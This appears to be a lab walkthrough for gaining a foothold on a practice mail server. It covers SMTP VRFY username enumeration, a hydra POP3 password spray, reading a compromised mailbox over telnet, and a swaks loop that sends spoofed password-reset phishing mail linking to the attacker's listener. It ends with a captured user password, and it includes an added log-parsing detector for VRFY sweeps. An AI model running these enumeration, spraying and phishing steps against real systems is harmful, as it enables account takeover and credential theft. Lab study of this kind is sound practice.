# Foothold

<figure><img src="/files/kMQzS6DCmdukRH89qEpY" alt=""><figcaption></figcaption></figure>

| First.Last     | FLast    | FirstL     |
| -------------- | -------- | ---------- |
| Claire.Madison | Cmadison | ClaireM    |
| Mike.Ross      | Mross    | MikeR      |
| Brian.Moore    | Bmoore   | Brianmoore |
| Sarah.Lorem    | SLorem   | SarahL     |

```
$ nmap -p25 --script=smtp* postfish.off                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:57 CDT
Nmap scan report for postfish.off (192.168.185.137)
Host is up (0.039s latency).

PORT   STATE SERVICE
25/tcp open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users: 
|_  root

Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds
```

```
$ smtp-user-enum -U users.lower -t postfish.off
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lower
Target count ............. 1
Username count ........... 8
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Wed Sep 11 06:18:51 2024 #########
postfish.off: brian.moore exists
postfish.off: hr exists
postfish.off: sales exists
postfish.off: legal exists
postfish.off: mike.ross exists
postfish.off: sarah.lorem exists
postfish.off: it exists
postfish.off: claire.madison exists
######## Scan completed at Wed Sep 11 06:18:53 2024 #########
8 results.

8 queries in 2 seconds (4.0 queries / sec)

```

{% hint style="success" %}
Found some valid usernames
{% endhint %}

```
claire.madison
mike.ross
brian.moore
sarah.lorem
it
hr
sales
legal
```
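Seen from the mail server, the VRFY sweep above leaves a trace in Postfix's per-session summary lines. The following is an added example, not part of the original walkthrough: it sums VRFY attempts per client and flags heavy users, assuming the Postfix 3.x `disconnect from host[ip] ... vrfy=ok/total` log format. The log lines, hostnames and IP addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines in the (assumed) Postfix 3.x session-summary format.
# "vrfy=2/5" means 2 of 5 VRFY commands were accepted; "vrfy=1" means all were.
SAMPLE_LOG = """\
Sep 11 06:18:52 mail postfix/smtpd[2101]: disconnect from unknown[203.0.113.50] helo=1 vrfy=2/5 quit=1 commands=4/7
Sep 11 06:18:53 mail postfix/smtpd[2102]: disconnect from unknown[203.0.113.50] helo=1 vrfy=6/9 quit=1 commands=8/11
Sep 11 06:20:10 mail postfix/smtpd[2110]: disconnect from relay.example[198.51.100.7] ehlo=1 mail=1 rcpt=1 data=1 quit=1 commands=5
Sep 11 06:21:44 mail postfix/smtpd[2115]: disconnect from unknown[198.51.100.9] ehlo=1 vrfy=1 quit=1 commands=3
"""

DISCONNECT = re.compile(
    r"postfix/smtpd\[\d+\]: disconnect from \S*\[(?P<ip>[^\]]+)\](?P<stats>.*)$"
)
VRFY = re.compile(r"\bvrfy=(\d+)(?:/(\d+))?")


def vrfy_counts(log_text):
    """Return {client_ip: (accepted, attempted)} summed over all sessions."""
    totals = defaultdict(lambda: [0, 0])
    for line in log_text.splitlines():
        session = DISCONNECT.search(line)
        if not session:
            continue
        vrfy = VRFY.search(session.group("stats"))
        if not vrfy:
            continue  # session issued no VRFY at all
        accepted = int(vrfy.group(1))
        attempted = int(vrfy.group(2)) if vrfy.group(2) else accepted
        totals[session.group("ip")][0] += accepted
        totals[session.group("ip")][1] += attempted
    return {ip: tuple(counts) for ip, counts in totals.items()}


def flag_enumerators(log_text, threshold=5):
    """Clients whose total VRFY attempts meet the threshold, busiest first."""
    hits = [(ip, ok, total)
            for ip, (ok, total) in vrfy_counts(log_text).items()
            if total >= threshold]
    return sorted(hits, key=lambda hit: hit[2], reverse=True)


if __name__ == "__main__":
    for ip, ok, total in flag_enumerators(SAMPLE_LOG):
        print(f"{ip}: {total} VRFY attempts, {ok} confirmed addresses")
```

Counts are summed per client because a multi-worker scan spreads its queries over several short sessions. Setting `disable_vrfy_command = yes` in Postfix's `main.cf` removes the VRFY response that makes this enumeration possible.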

```
$ hydra -L users.lower -P users.lower postfish.off pop3 -vV -I -t 10 
```

<figure><img src="/files/msBljQFHVtpgZ6A55WGX" alt=""><figcaption></figcaption></figure>

```
sales:sales
```

```
$ telnet postfish.off 110
Trying 192.168.211.137...
Connected to postfish.off.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets
```

<figure><img src="/files/dwfjL0HRQ7xTqqYYRwc5" alt=""><figcaption></figcaption></figure>

```
claire.madison@postfish.off
mike.ross@postfish.off
brian.moore@postfish.off
sarah.lorem@postfish.off
it@postfish.off
hr@postfish.off
sales@postfish.off
legal@postfish.off
```

```
$ nc -lnvp 80
```

```
$ for i in $(cat emails.txt); do swaks --to $i@postfish.off --from it@postfish.off --header 'Subject: Password Reset Link' --body 'Reset your password and get pwned here http://192.168.45.168' --server 192.168.211.137; done
```

<figure><img src="/files/AUL8bXXoP520pFvSAno4" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/kAf2rhU4mMLLfP1Y1oPn" alt=""><figcaption></figcaption></figure>

`first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confirm_password%3DEternaLSunshinE`

```
brian.moore:EternaLSunshinE
```

<figure><img src="/files/Zv9qfQTXjNsduey8SXL2" alt=""><figcaption></figcaption></figure>

